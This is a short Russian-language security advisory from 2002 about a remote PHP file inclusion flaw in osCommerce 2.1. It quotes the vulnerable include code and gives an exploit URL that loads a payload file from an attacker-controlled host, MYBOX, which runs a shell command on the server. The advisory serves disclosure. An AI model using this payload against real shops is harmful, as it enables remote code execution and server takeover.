Внедрение PHP кода в osCommerce
| Дата публикации: | 20.06.2002 |
| Всего просмотров: | 4908 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | osCommerce – открытая реализация e-commerce. Уязвимость в программе позволяет удаленным атакующим включать произвольный PHP код в существующие страницы.
osCommerce поставляется с файлом /catalog/includes/include_once.php, который содержит следующий код:
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
URL типа http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, позволяет включить произвольный код.
Например просмотр содержимого директории:http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/a.php,где
--- a.php ---
<? passthru("/bin/ls")?>
-------------
уязвимость обнаружена в osCommerce Preview Release 2.1
|
| Ссылки: | PHP Source Injection in osCommerce |